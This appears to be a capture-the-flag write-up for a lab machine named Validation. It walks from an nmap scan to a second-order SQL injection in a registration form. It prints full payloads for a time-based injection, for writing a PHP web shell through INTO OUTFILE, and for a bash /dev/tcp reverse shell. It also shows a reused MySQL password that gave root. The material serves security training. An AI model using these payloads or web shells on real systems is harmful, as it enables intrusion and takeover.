namp -sC -sV -oA validation 10.10.11.116
Nmap scan report for 10.10.11.116
Host is up (0.18s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
| 256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_ 256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-server-header: Apache/2.4.48 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
5000/tcp filtered upnp
5001/tcp filtered commplex-link
5002/tcp filtered rfe
5003/tcp filtered filemaker
5004/tcp filtered avt-profile-1
8080/tcp open http nginx
|_http-title: 502 Bad Gateway
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We have 3 ports open: 22 => ssh 80 => http 8080 => http
Port 8080 gives 502 Bad Gateway so lets enumerate port 80 ![[Pasted image 20210923191459.png]]
Going to http://10.10.11.116 we have a registeration form. ![[Pasted image 20210923191422.png]]
Putting some data and click submit. ![[Pasted image 20210923192723.png]] It seems like it's saving our inputs into the database and then fetching them and displaying them on the page. or it is just displaying them without using a database.
Tried injecting a single quote in the username field but nothing happend, then i intercepted the request and injected a single quote in the country parameter and i got this error. ![[Pasted image 20210923193406.png]]
Making the connection sleep for 10 seconds
Andorra' UNION SELECT sleep(10); -- -
![[Pasted image 20210923195623.png]]
And follow redirection, it worked successfully. ![[Pasted image 20210923195446.png]]
I guess we have a second order SQL injection vulnerability, because the sleep occurs when fetching (displaying) the data on the page, and doesn't occur when submitting the data at first.
That means that the user input is sanatized correctly, but the problem is when the web application fetches the data that is already stored in the database it doesn't validate it again.
Now that we have a SQLi, lets try to drop a shell on the box.
Andorra' UNION SELECT '<?php SYSTEM($_GET["c"]) ?>' INTO OUTFILE '/var/www/html/shell.php' -- -
![[Pasted image 20210923203159.png]]
![[Pasted image 20210923203456.png]]
We get an error but when we try to visit shell.php it's created successfully. ![[Pasted image 20210923203702.png]]
Now lets specify the c parameter to execute id command. ![[Pasted image 20210923203810.png]]
You can use any reverse shell you want, i like using this one bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'
![[Pasted image 20210923205030.png]]
There is config file that contains mysql credentials uhc:uhc-9qual-global-pw ![[Pasted image 20210923211743.png]]
Tried this password with root and we are now root! ![[Pasted image 20210923212023.png]]